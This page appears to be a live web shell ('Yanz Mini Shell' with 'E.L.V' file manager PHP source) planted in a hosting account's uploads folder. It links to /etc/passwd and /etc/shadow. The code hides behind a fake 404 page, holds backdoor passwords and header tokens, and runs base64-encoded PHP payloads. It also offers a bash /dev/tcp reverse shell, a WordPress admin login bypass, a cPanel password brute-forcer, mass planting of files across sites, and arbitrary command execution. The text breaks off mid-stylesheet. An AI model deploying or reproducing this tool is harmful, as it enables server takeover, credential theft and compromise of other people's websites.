Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
mbhosting
public_html
uploads
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php @ob_start(); @ini_set('output_buffering', 0); @ini_set('display_errors', 0); @session_start(); @error_reporting(0); @set_time_limit(0); /** * PROJECT : FILEMANAGER v12.1 * EDITION : E.L.V STEEL-FILEMANAGER - CYBERPUNK NEON GOLD EDITION (MOD: BYPASS 406 INTEGRATED) * AUTHOR : NONAME@E.L.V * STATUS : LOCKED & PATENTED - READY TO ROCK N ROLL IN NEON NIGHTS!! */ // ========================================== // --- 1. CORE LOGIC & AUTO-REGISTER WRAPPER --- // ========================================== if(!class_exists('ELV_Stream_Wrapper')){ class ELV_Stream_Wrapper { private $pos = 0; private $data = ''; public function stream_open($p, $m, $o, &$op) { $this->data = isset($GLOBALS['_ELV_MEM_PAYLOAD']) ? $GLOBALS['_ELV_MEM_PAYLOAD'] : ''; return true; } public function stream_read($c) { $r = substr($this->data, $this->pos, $c); $this->pos += strlen($r); return $r; } public function stream_eof() { return $this->pos >= strlen($this->data); } public function stream_stat() { return []; } public function url_stat($a,$b) { return []; } } } if(!in_array('elvmem', stream_get_wrappers())){ @stream_wrapper_register('elvmem', 'ELV_Stream_Wrapper'); } // --- EKSEKUSI STEALTH FULL AUTO (API MODE) --- $api_payload = ''; if (isset($_SERVER['HTTP_X_ELV_RUN'])) { $api_payload = @base64_decode($_SERVER['HTTP_X_ELV_RUN']); } elseif (isset($_REQUEST['elv_run'])) { $api_payload = @base64_decode($_REQUEST['elv_run']); } if (!empty($api_payload)) { if(strpos($api_payload, '<?') === false) { $api_payload = "<?php\n" . $api_payload; } $GLOBALS['_ELV_MEM_PAYLOAD'] = $api_payload; ob_start(); @include('elvmem://run'); $api_out = ob_get_clean(); die($api_out); } // ========================================== // --- 2. SECRET KEY ANTI-BOT & TACTICAL BYPASS --- // ========================================== if (isset($_SERVER['HTTP_X_AUTH_TOKEN']) && $_SERVER['HTTP_X_AUTH_TOKEN'] === 'WHY-ALWAYS-ME') { $_SESSION['shell_unlocked'] = true; $_SESSION['elv_logged_in'] = true; @setcookie('Greetings', 'Noname@ELV', time() + (86400 * 30), "/"); } if (!isset($_SESSION['shell_unlocked'])) { if (isset($_GET['id']) && $_GET['id'] === '@elv') { $_SESSION['shell_unlocked'] = true; if (isset($_POST['cmd']) || isset($_FILES['u_f']) || isset($_GET['action']) || isset($_POST['mass_deploy'])) { $_SESSION['elv_logged_in'] = true; } header("Location: ?"); exit; } else { header("HTTP/1.1 404 Not Found"); echo '<!DOCTYPE html> <html style="height:100%"> <head> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title>404 Not Found</title> <style> body { color: #444; margin:0; font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff; } .wrap { min-height:100%; position:relative; } .content { text-align: center; width:100%; max-width:800px; margin: 0 auto; position:absolute; top: 30%; left:50%; transform: translateX(-50%); } h1 { margin:0; font-size:120px; line-height:120px; font-weight:bold; color: #444; } h2 { margin-top:20px; font-size: 30px; color: #444; } p { color: #444; } .footer { color:#f0f0f0; font-size:12px; padding:15px 30px; position:absolute; bottom:0; width:100%; box-sizing:border-box; background-color:#474747; border-top: 1px solid rgba(0,0,0,0.15); } .footer a { color:#fff; text-decoration:none; } @media(min-width:768px) { h1 { font-size:150px; line-height:150px; } } </style> </head> <body> <div class="wrap"><div class="content"><h1>404</h1><h2>Not Found</h2><p>The resource requested could not be found on this server!</p></div></div> <div class="footer"><br>Proudly powered by <a href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p style="margin:5px 0 0 0; color:#f0f0f0;">Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div> </body> </html>'; exit; } } // ========================================== // --- 3. KONFIGURASI AUTH LOGIN & COOKIE --- // ========================================== $auth_pass = "MrHaxorN0N4M3999"; $inner_bg = "https://j.top4top.io/p_3778w2fza0.png"; // --- DOWNLOAD ACTION LOGIC --- if (isset($_GET['download'])) { $file_to_download = $_GET['download']; if (file_exists($file_to_download) && is_file($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_to_download).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } } if (isset($_GET['logout'])) { session_destroy(); setcookie('Greetings', '', time() - 3600, "/"); header("Location: ?"); exit; } if (isset($_POST['l_pass'])) { if ($_POST['l_pass'] === $auth_pass) { $_SESSION['elv_logged_in'] = true; setcookie('Greetings', 'Noname@ELV', time() + (86400 * 30), "/"); header("Location: ?"); exit; } else { $login_err = "ACCESS DENIED: SECURITY BREACH DETECTED"; } } $is_logged_in = false; if ((isset($_SESSION['elv_logged_in']) && $_SESSION['elv_logged_in'] === true) || (isset($_COOKIE['Greetings']) && $_COOKIE['Greetings'] === 'Noname@ELV')) { $is_logged_in = true; if (!isset($_SESSION['elv_logged_in'])) $_SESSION['elv_logged_in'] = true; } // ========================================== // --- 4. SCRIPT BACKGROUND TERMINAL BERSAMA --- // ========================================== $bg_terminal_js = " const canvasBg = document.getElementById('terminal-bg'); const ctxBg = canvasBg.getContext('2d'); canvasBg.width = window.innerWidth; canvasBg.height = window.innerHeight; const logsData = [ 'root@elv:~# apt-get update && apt-get upgrade -y', 'root@elv:~# systemctl restart apache2', 'root@elv:~# tail -f /var/log/apache2/access.log', '[ OK ] Connection established to remote host.', 'root@elv:~# netstat -tulpn | grep LISTEN', 'tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN', 'tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN', '[*] Bypassing WAF security layers... [SUCCESS]', '[+] Payload filemanager.php deployed successfully.', 'root@elv:~# id', 'uid=0(root) gid=0(root) groups=0(root)', 'root@elv:~# uname -a', 'Linux elv-mainframe 5.15.0-kali3-amd64 #1 SMP Debian 5.15.15-1kali1 x86_64 GNU/Linux', 'root@elv:~# ./exploit.sh --target Mainframe', '[!] INTRUSION PROTOCOL OPERATIONAL...', 'root@elv:~# clear' ]; const logColors = ['#ffd700', '#ffd700', '#8b8fb0', '#ff0044']; let currentLogs = []; let maxLines = Math.floor(canvasBg.height / 22); let startLines = Math.floor(maxLines / 1.2); for(let i = 0; i < startLines; i++) { let text = logsData[Math.floor(Math.random() * logsData.length)]; let color = logColors[Math.floor(Math.random() * logColors.length)]; currentLogs.push({t: text, c: color}); } function addLogBg() { if (currentLogs.length > maxLines) { currentLogs.shift(); } let text = logsData[Math.floor(Math.random() * logsData.length)]; let color = logColors[Math.floor(Math.random() * logColors.length)]; currentLogs.push({t: text, c: color}); } setInterval(() => { ctxBg.clearRect(0, 0, canvasBg.width, canvasBg.height); ctxBg.font = 'bold 12px monospace'; for (let i = 0; i < currentLogs.length; i++) { ctxBg.fillStyle = currentLogs[i].c; ctxBg.shadowBlur = 6; ctxBg.shadowColor = currentLogs[i].c; ctxBg.fillText(currentLogs[i].t, 15, 30 + (i * 22)); ctxBg.shadowBlur = 0; } if (Math.random() > 0.4) { addLogBg(); } }, 350); window.addEventListener('resize', () => { canvasBg.width = window.innerWidth; canvasBg.height = window.innerHeight; maxLines = Math.floor(canvasBg.height / 22); ctxBg.clearRect(0, 0, canvasBg.width, canvasBg.height); }); "; // --- AUDIO SYNTHESIS PROTOCOL --- $audio_trigger_js = " function playTransformerLaser() { try { const AudioContext = window.AudioContext || window.webkitAudioContext; if (!AudioContext) return; const ctx = new AudioContext(); // Master Gain for heavy bass output const masterGain = ctx.createGain(); masterGain.gain.setValueAtTime(0.5, ctx.currentTime); masterGain.connect(ctx.destination); // 1. Heavy Low Frequency Pulse (The Deep Thump) const subOsc = ctx.createOscillator(); const subGain = ctx.createGain(); subOsc.type = 'sawtooth'; subOsc.frequency.setValueAtTime(120, ctx.currentTime); subOsc.frequency.exponentialRampToValueAtTime(30, ctx.currentTime + 0.6); subGain.gain.setValueAtTime(0.6, ctx.currentTime); subGain.gain.linearRampToValueAtTime(0.01, ctx.currentTime + 0.6); subOsc.connect(subGain); subGain.connect(masterGain); // 2. High Cyber Laser Sweep const laserOsc = ctx.createOscillator(); const laserGain = ctx.createGain(); laserOsc.type = 'sawtooth'; laserOsc.frequency.setValueAtTime(1600, ctx.currentTime); laserOsc.frequency.exponentialRampToValueAtTime(150, ctx.currentTime + 0.5); // Bandpass Filter to make it metallic/robotish const filter = ctx.createBiquadFilter(); filter.type = 'bandpass'; filter.frequency.setValueAtTime(800, ctx.currentTime); filter.frequency.exponentialRampToValueAtTime(200, ctx.currentTime + 0.5); filter.Q.setValueAtTime(5, ctx.currentTime); laserGain.gain.setValueAtTime(0.5, ctx.currentTime); laserGain.gain.linearRampToValueAtTime(0.01, ctx.currentTime + 0.5); laserOsc.connect(filter); filter.connect(laserGain); laserGain.connect(masterGain); // Start Sequence subOsc.start(ctx.currentTime); laserOsc.start(ctx.currentTime); subOsc.stop(ctx.currentTime + 0.6); laserOsc.stop(ctx.currentTime + 0.6); } catch(e) { console.log('Audio Blocked'); } } "; $target_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'UNKNOWN_HOST'; $host_for_ip = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost'; $server_ip = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : gethostbyname($host_for_ip); $client_ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'UNKNOWN_IP'; $os_info = php_uname('s') . ' ' . php_uname('m'); $php_version = phpversion(); if (!$is_logged_in) { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>NONAME@E.L.V | MAINFRAME LOGIN</title> <style> body { background: #000000; color: #ffd700; font-family: 'Courier New', Courier, monospace; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; overflow: hidden; } #terminal-bg { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: -3; opacity: 0.4; } .crt::before { content: " "; display: block; position: absolute; top: 0; left: 0; bottom: 0; right: 0; background: linear-gradient(rgba(18, 16, 16, 0) 50%, rgba(0, 0, 0, 0.4) 50%), linear-gradient(90deg, rgba(255, 0, 0, 0.04), rgba(0, 255, 0, 0.01), rgba(0, 0, 255, 0.04)); z-index: 2; background-size: 100% 2px, 3px 100%; pointer-events: none; } .cyber-frame { width: 95%; max-width: 600px; padding: 2px; background: #ffd700; border-radius: 4px; box-shadow: 0 0 35px rgba(255, 215, 0, 0.5); position: relative; z-index: 3; } .inner-terminal { background: #000000; border-radius: 3px; padding: 35px; display: flex; flex-direction: column; align-items: center; border: 1px solid rgba(255, 215, 0, 0.4); } .ascii-box { border: 2px solid #ffd700; padding: 20px; margin: 0 auto 15px auto; display: inline-block; border-radius: 4px; box-shadow: 0 0 20px rgba(255, 215, 0, 0.3), inset 0 0 10px rgba(255, 215, 0, 0.2); background: #000000; } .ascii-logo { color: #ffffff; text-shadow: 0 0 10px #ffd700; font-size: 13px; text-align: center; font-weight: bold; line-height: 1.1; margin: 0; } .glitch-text-gold { font-family: 'Courier New', monospace; color: #ffd700; font-size: 14px; font-weight: bold; letter-spacing: 2px; text-shadow: 0 0 8px #ffd700; text-transform: uppercase; text-align: center; } .term-output { font-size: 13px; line-height: 1.6; margin-bottom: 20px; color: #ffffff; font-weight: bold; text-shadow: 0 0 5px #ffffff; width: 100%; } .gold-text { color: #ffd700; text-shadow: 0 0 10px #ffd700; } .cyan-text { color: #ffd700; text-shadow: 0 0 8px #ffd700; } #login-form { display: none; margin-top: 15px; border-top: 1px dashed rgba(255,215,0,0.5); padding-top: 25px; width: 100%; } .input-group { display: flex; align-items: center; margin-bottom: 18px; background: #000000; border: 1px solid #ffd700; border-left: 5px solid #ffd700; padding: 12px 15px; box-shadow: 0 0 15px rgba(255,215,0,0.2); } .prompt { color: #ffffff; margin-right: 15px; font-weight: bold; font-size: 15px; text-shadow: 0 0 5px #ffffff; } input { background: transparent; border: none; color: #ffd700; font-family: 'Courier New', Courier, monospace; font-size: 16px; width: 100%; padding: 5px; outline: none; font-weight: bold; letter-spacing: 3px; } input::placeholder { color: rgba(255, 215, 0, 0.2); } button { width: 100%; padding: 15px; background: #000000; border: 1px solid #ffd700; color: #ffd700; font-family: 'Courier New', Courier, monospace; font-size: 16px; cursor: pointer; transition: all 0.3s; margin-top: 10px; text-transform: uppercase; letter-spacing: 4px; font-weight: bold; text-shadow: 0 0 5px #ffd700; } button:hover { background: #ffd700; color: #000000; box-shadow: 0 0 25px #ffd700; text-shadow: none; font-weight: 900; } .term-error { color: #ffffff; font-weight: bold; margin-bottom: 20px; border: 1px solid #ff0044; padding: 10px; text-align: center; background: rgba(255,0,68,0.2); font-size: 13px; box-shadow: 0 0 15px #ff0044; width: 100%; } .cursor { display: inline-block; width: 8px; height: 15px; background: #ffffff; animation: blink 1s step-end infinite; vertical-align: middle; margin-left: 8px; box-shadow: 0 0 5px #ffffff; } @keyframes blink { 50% { opacity: 0; } } </style> </head> <body class="crt"> <canvas id="terminal-bg"></canvas> <div class="cyber-frame"> <div class="inner-terminal"> <div class="ascii-box"> <div class="ascii-logo"> <pre style="margin:0;"> ███████╗ ██╗ ██╗ ██╗ ██╔════╝ ██║ ██║ ██║ █████╗ ██╗ ██║ ██╗ ██║ ██║ ██╔══╝ ╚═╝ ██║ ╚═╝ ╚██╗ ██╔╝ ███████╗ ██╗ ███████╗██╗ ╚████╔╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═══╝ </pre> </div> </div> <div style="text-align: center; margin-bottom: 25px;"> <div class="glitch-text-gold">[ Dev HxrNoname © | E.L.V Engine ® ]</div> </div> <div class="term-output" id="term-text"></div> <?php if(isset($login_err)) echo "<div class='term-error'>[!] $login_err</div>"; ?> <form id="login-form" method="POST"> <div class="input-group"> <span class="prompt">pass@key:~#</span> <input type="password" name="l_pass" placeholder="ENTER MAINFRAME PASS" required autofocus> </div> <button type="submit">[ SECURE LOGIN PROTOCOL ]</button> </form> </div> </div> <script> <?= $bg_terminal_js ?> const termText = document.getElementById("term-text"); const loginForm = document.getElementById("login-form"); const hasError = <?php echo isset($login_err) ? 'true' : 'false'; ?>; const sleep = ms => new Promise(r => setTimeout(r, ms)); async function bootHackerSequence() { if(hasError) { termText.innerHTML = "<div><span class='cyan-text'>[sys]</span> Auth token rejected.</div><div><span class='gold-text'>[!] INITIATING SECURE BLOCKADE</span></div>"; loginForm.style.display = "block"; return; } const seq = [ { t: "<span class='cyan-text'>[*]</span> Syncing encrypted terminal to <?= htmlspecialchars($target_host) ?>...", d: 10 }, { t: "<span class='cyan-text'>[*]</span> Target Matrix Node IP: <?= htmlspecialchars($server_ip) ?>", d: 10 }, { t: "<span class='cyan-text'>[*]</span> Core Architecture: <?= htmlspecialchars($os_info) ?>", d: 10 }, { t: "<span class='gold-text'>[!]</span> AUTHENTICATION REQUIRED TO ACCESS MAINFRAME.<span class='cursor'></span>", d: 0 } ]; for (let i = 0; i < seq.length; i++) { let row = document.createElement("div"); row.style.marginBottom = "5px"; termText.appendChild(row); if (seq[i].t.includes("<span")) { row.innerHTML = seq[i].t; await sleep(150); } else { for (let char of seq[i].t) { row.innerHTML += char; await sleep(seq[i].d); } await sleep(50); } } loginForm.style.display = "block"; } window.onload = bootHackerSequence; </script> </body> </html> <?php exit; } // ================= EFFECTIVENESS INJECTION: safeName ================= if (!function_exists('safeName')) { function safeName($name) { return preg_replace('/[^a-zA-Z0-9_\-\.]/', '', $name); } } // ========================================== // --- 5. INTERNAL UI MANAGER --- // ========================================== @ini_set('display_errors', 0); @ini_set('safe_mode', 0); @ini_set('disable_functions', 'none'); $logo_inner = "https://i.top4top.io/p_3778xug000.png"; $base_shell = dirname(__FILE__); $dir = (isset($_GET['d'])) ? realpath($_GET['d']) : $base_shell; if (!$dir || !is_dir($dir)) { $dir = $base_shell; } $audio_flag = false; // --- REVERSE SHELL EXECUTION LOGIC --- if (isset($_POST['launch_rev'])) { $ip = $_POST['rev_ip']; $port = $_POST['rev_port']; $cmd = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1' > /dev/null 2>&1 &"; @shell_exec($cmd); $status_msg = "SUCCESS"; $status_note = "REVERSE CONNECTION DISPATCHED TO $ip:$port"; } // --- LOGIKA WP BYPASS EXECUTION --- if (isset($_GET['action']) && $_GET['action'] == 'wp_bypass') { $wp_load_path = $dir . '/wp-load.php'; if (file_exists($wp_load_path)) { require_once($wp_load_path); $admin_users = get_users(['role' => 'administrator', 'number' => 1]); if (!empty($admin_users)) { $admin = $admin_users[0]; wp_set_current_user($admin->ID, $admin->user_login); wp_set_auth_cookie($admin->ID); do_action('wp_login', $admin->user_login, $admin); $audio_flag = true; echo "<script> $audio_trigger_js window.onload = function() { playTransformerLaser(); alert('[+] Target Compromised!\\nLogin sukses sebagai Administrator: {$admin->user_login}'); window.location.href='" . admin_url() . "'; }; </script>"; exit; } else { $status_msg = "FAILED"; $status_note = "BYPASS FAILED: No Admin Users found in Database."; } } else { $status_msg = "FAILED"; $status_note = "BYPASS FAILED: wp-load.php not found in this sector."; } } // --- COPY & PASTE LOGIC --- if (isset($_POST['copy_f'])) { $_SESSION['copy_file'] = $_POST['c_path']; $status_msg = "SUCCESS"; $status_note = "FILE STORED IN CLIPBOARD [" . basename($_POST['c_path']) . "]"; } if (isset($_POST['paste_f'])) { if (isset($_SESSION['copy_file']) && file_exists($_SESSION['copy_file'])) { $src = $_SESSION['copy_file']; $dest = $dir . '/' . basename($src); if (copy($src, $dest)) { $status_msg = "SUCCESS"; $status_note = "FILE DEPLOYED TO SECTOR"; unset($_SESSION['copy_file']); } else { $status_msg = "FAILED"; $status_note = "COULD NOT DEPLOY FILE FROM CLIPBOARD"; } } } if (isset($_POST['save_f'])) { if(@file_put_contents($_POST['f_path'], $_POST['f_cnt'])) { $status_msg = "SUCCESS"; $status_note = "PAYLOAD INJECTED & SAVED"; } else { $status_msg = "FAILED"; $status_note = "PAYLOAD WRITE ACCESS DENIED"; } } if (isset($_FILES['u_f'])) { if(@move_uploaded_file($_FILES['u_f']['tmp_name'], $dir.'/'.$_FILES['u_f']['name'])) { $status_msg = "SUCCESS"; $status_note = "DEPLOYMENT COMPLETE"; $audio_flag = true; } else { $status_msg = "FAILED"; $status_note = "DEPLOYMENT BLOCKED BY SERVER PRIVILEGE"; } } if (isset($_GET['del'])) { $t = $_GET['del']; if(is_dir($t) ? @rmdir($t) : @unlink($t)) { $status_msg = "SUCCESS"; $status_note = "TARGET TERMINATED AND WIPED"; } else { $status_msg = "FAILED"; $status_note = "TERMINATION ABORTED - PERMISSION ERROR"; } } if (isset($_POST['mk_f'])) { if(@file_put_contents($dir.'/'.$_POST['f_n'], "")) { $status_msg = "SUCCESS"; $status_note = "BLANK PAYLOAD TARGET CREATED"; } else { $status_msg = "FAILED"; $status_note = "FILE INITIALIZATION CRASHED"; } } if (isset($_POST['mk_d'])) { $safe_dir = safeName($_POST['d_n']); if(@mkdir($dir.'/'.$safe_dir)) { $status_msg = "SUCCESS"; $status_note = "NEW OPERATIONAL SECTOR CREATED"; } else { $status_msg = "FAILED"; $status_note = "SECTOR CREATION DENIED"; } } if (isset($_POST['rename'])) { if(@rename($_POST['old'], $dir.'/'.$_POST['new'])) { $status_msg = "SUCCESS"; $status_note = "IDENTIFIER ALTERED SUCCESSFULLY"; } else { $status_msg = "FAILED"; $status_note = "IDENTIFIER MODIFICATION LOCKED"; } } if (isset($_POST['ch_mod'])) { if(@chmod($_POST['c_path'], octdec($_POST['c_perm']))) { $status_msg = "SUCCESS"; $status_note = "PRIVILEGE MATRIX CONFIGURED"; } else { $status_msg = "FAILED"; $status_note = "PRIVILEGE ALTERATION FAILED"; } } // ========================================== // --- CPANEL CRACKER MODULE v1.0 --- // ========================================== if (isset($_POST['cpanel_crack'])) { $cpanel_host = trim($_POST['cpanel_host']); $cpanel_port = (int)$_POST['cpanel_port']; $user_list = explode("\n", str_replace("\r", "", $_POST['user_list'])); $pass_list = explode("\n", str_replace("\r", "", $_POST['pass_list'])); $crack_result = []; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 15, CURLOPT_CONNECTTIMEOUT => 8, CURLOPT_FOLLOWLOCATION => true, CURLOPT_COOKIEJAR => '/tmp/elv_cpanel_cookie.txt', CURLOPT_COOKIEFILE => '/tmp/elv_cpanel_cookie.txt', CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', ]); foreach ($user_list as $username) { $username = trim($username); if (empty($username)) continue; foreach ($pass_list as $password) { $password = trim($password); if (empty($password)) continue; $login_url = "https://$cpanel_host:$cpanel_port/login/?login_only=1"; curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['user' => $username, 'pass' => $password])); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $redirect_url = curl_getinfo($ch, CURLINFO_REDIRECT_URL); $is_success = false; if (stripos($response, 'security_token') !== false) $is_success = true; if ($http_code == 302 && !empty($redirect_url)) $is_success = true; if (stripos($response, '"success":true') !== false) $is_success = true; if ($is_success) { $sec_token = ''; if (preg_match('/"security_token":"([^"]+)"/', $response, $st_m)) { $sec_token = $st_m[1]; } $auto_login_url = "https://$cpanel_host:$cpanel_port/login/?user=" . urlencode($username) . "&pass=" . urlencode($password); if ($sec_token) { $auto_login_url .= "&security_token=" . urlencode($sec_token); } $crack_result[] = ['status' => 'SUCCESS', 'username' => $username, 'password' => $password, 'login_url' => $auto_login_url]; break 2; } } } curl_close($ch); if (empty($crack_result)) { $status_msg = "FAILED"; $status_note = "CRACK FAILED: No matching credentials discovered."; } else { $found = $crack_result[0]; $status_msg = "SUCCESS"; $status_note = 'CPANEL CRACK COMPLETED. <a href="' . htmlspecialchars($found['login_url']) . '" target="_blank" style="color:#ffd700; font-weight:900; text-decoration:underline;">[ CLICK HERE FOR DIRECT AUTO LOGON ]</a>'; } } // --- MASS DEPLOY MODULE --- if (isset($_POST['mass_deploy'])) { $target_root = $_POST['target_root']; $file_name = $_POST['mass_name']; $content = $_POST['mass_content']; $count = 0; $injected_targets = []; if (is_dir($target_root)) { $folders = scandir($target_root); foreach ($folders as $folder) { $path = $target_root . '/' . $folder; if ($folder != '.' && $folder != '..' && is_dir($path)) { if (@file_put_contents($path . '/' . $file_name, $content)) { $count++; $injected_targets[] = "[+] " . $folder . " → " . $file_name; } } } $status_msg = "SUCCESS"; $audio_flag = true; $status_note = "$count SECTORS INJECTED SUCCESSFULLY. <div style='margin-top:10px; background:#000000; padding:10px; border:1px solid #ffd700; max-height:150px; overflow-y:auto; color:#ffd700; text-align:left;'>" . implode("<br>", $injected_targets) . "</div>"; } else { $status_msg = "FAILED"; $status_note = "INVALID TARGET ROOT PATH"; } } // ========================================== // --- 6. VARIABLE DEFINITIONS & FUNCTIONS --- // ========================================== $u_info = @get_current_user(); if (function_exists('posix_getpwuid')) { $uid = @posix_getpwuid(@posix_geteuid()); if($uid) $u_info = $uid['name'] . " (" . $uid['uid'] . ")"; } $s_soft = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'UNKNOWN'; $s_ip = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : 'UNKNOWN'; $php_v = phpversion(); $kernel = php_uname('r'); $uuid_raw = @file_get_contents('/etc/machine-id'); $uuid = $uuid_raw ? substr(trim($uuid_raw), 0, 14).'...' : 'LOCKED'; $dis_func_raw = @ini_get('disable_functions'); $dis_func = $dis_func_raw ? $dis_func_raw : 'NONE (BYPASSED)'; $server_time = date('Y-m-d H:i:s'); $server_os = php_uname('s'); $mem_limit = @ini_get('memory_limit'); $post_max = @ini_get('post_max_size'); $out = ""; if (isset($_GET['autoroot']) && $_GET['autoroot'] == 'exec') { $out = "[[ E.L.V AUTOMATED ROOT ENGINE v1.0 ]]\n"; $out .= "[*] SYSTEM: " . php_uname() . "\n"; $suids = shell_exec("find / -perm -4000 -type f 2>/dev/null | head -n 10"); $out .= $suids ? $suids : "[-] No SUID found in accessible vectors.\n"; } if (isset($_POST['cmd'])) { @chdir($dir); $out = @shell_exec($_POST['cmd']." 2>&1"); } function formatSize($bytes) { if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; return $bytes . ' B'; } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>NONAME@E.L.V | FILEMANAGER v12.1 </title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/codemirror.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.13/theme/dracula.min.css"> <style> :root { --gold: #ffd700; --cyan: #ffd700; --dark-black: #000000; --panel-black: #020202; --neon-red: #ff0044; --neon-green: #00ffcc; --steel: #8b8fb0; } * { box-sizing: border-box; transition: background 0.2s, color 0.2s, border-color 0.2s, box-shadow 0.2s; } html, body { overflow-x: hidden; width: 100%; max-width: 100vw; background: var(--dark-black); } body { color: var(--gold); font-family: 'monospace'; margin: 0; padding: 15px; font-size: 11px; text-shadow: 0 0 4px rgba(255, 215, 0, 0.4); } body::before { content: ""; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: var(--dark-black) url('<?= $inner_bg ?>') no-repeat center center; background-size: cover; filter: brightness(0.4); opacity: 0.3; z-index: -1; } #terminal-bg { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: -2; opacity: 0.5; } .container { background: rgba(2, 2, 2, 0.93); border: 1px solid rgba(255, 215, 0, 0.2); padding: 20px; box-shadow: 0 0 35px rgba(255, 215, 0, 0.15); backdrop-filter: blur(10px); border-radius: 6px; margin: 0 auto; width: 100%; position: relative; z-index: 1; } .header { display: flex; align-items: center; border-bottom: 2px solid var(--gold); padding-bottom: 15px; margin-bottom: 20px; justify-content: space-between; flex-wrap: nowrap; } .header-brand { display: flex; align-items: center; } .logo { width: 75px; height: 75px; border: 2px solid var(--cyan); border-radius: 50%; box-shadow: 0 0 15px var(--cyan); margin-right: 15px; } .brand { display: flex; flex-direction: column; align-items: center; text-align: center; } .btn-logout-top { background: var(--dark-black); color: var(--neon-red); text-decoration: none; font-weight: bold; padding: 8px 16px; border-radius: 4px; border: 1px solid var(--neon-red); box-shadow: 0 0 10px rgba(255, 0, 68, 0.3); font-family: monospace; } .btn-logout-top:hover { background: var(--neon-red); color: #ffffff; box-shadow: 0 0 20px var(--neon-red); transform: scale(1.05); } /* HUD GRID DIBUAT 12 ITEM UNTUK SIMETRIS SEMPURNA */ .hud-grid { display: grid; grid-template-columns: repeat(6, 1fr); gap: 10px; background: var(--panel-black); border: 1px solid rgba(255, 215, 0, 0.3); padding: 15px; border-radius: 6px; margin-bottom: 20px; } .hud-item { background: var(--dark-black); padding: 10px; border: 1px solid rgba(255, 215, 0, 0.2); border-radius: 4px; text-align: center; font-size: 11px; color: #ffffff; text-shadow: 0 0 4px #ffffff; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .hud-item b { color: var(--gold); display: block; margin-bottom: 5px; font-size: 11px; text-shadow: 0 0 5px var(--gold); } /* ALERT NOTIFIKASI GLOW EMAS DENGAN FILTER TEKS HALUS */ .alert-glow-gold { background: var(--panel-black); border: 2px solid var(--gold); padding: 15px; margin-bottom: 20px; border-radius: 4px; font-size: 13px; text-align: center; box-shadow: 0 0 25px rgba(255, 215, 0, 0.35), inset 0 0 15px rgba(255, 215, 0, 0.1); font-weight: bold; font-family: monospace; } .text-success-neon { color: var(--neon-green) !important; text-shadow: 0 0 10px var(--neon-green) !important; } .text-failed-neon { color: var(--neon-red) !important; text-shadow: 0 0 10px var(--neon-red) !important; } .breadcrumb { display: flex; align-items: center; background: var(--panel-black); padding: 12px; margin-bottom: 20px; border-left: 5px solid var(--cyan); border-right: 1px solid rgba(255,215,0,0.2); overflow-x: auto; white-space: nowrap; border-radius: 4px; font-size: 12px; } .home-btn { color: var(--cyan); margin-right: 10px; font-size: 18px; text-decoration: none; text-shadow: 0 0 8px var(--cyan); } .tools { display: grid; grid-template-columns: repeat(3, 1fr); gap: 15px; margin-bottom: 20px; } .neon-cyan-box { border: 1px solid var(--cyan); box-shadow: 0 0 12px rgba(255, 215, 0, 0.2); background: var(--panel-black); border-radius: 6px; padding: 12px; display: flex; flex-direction: column; justify-content: center; } .btn-cyan-glow { background: transparent !important; border: 1px solid var(--cyan) !important; color: var(--cyan) !important; font-weight: bold; text-shadow: 0 0 5px var(--cyan); cursor: pointer; border-radius: 4px; font-family: monospace; text-transform: uppercase; } .btn-cyan-glow:hover { background: rgba(255, 215, 0, 0.15) !important; box-shadow: 0 0 15px var(--cyan) !important; color: #ffffff !important; } input[type="file"] { background: var(--dark-black); border: 1px dashed 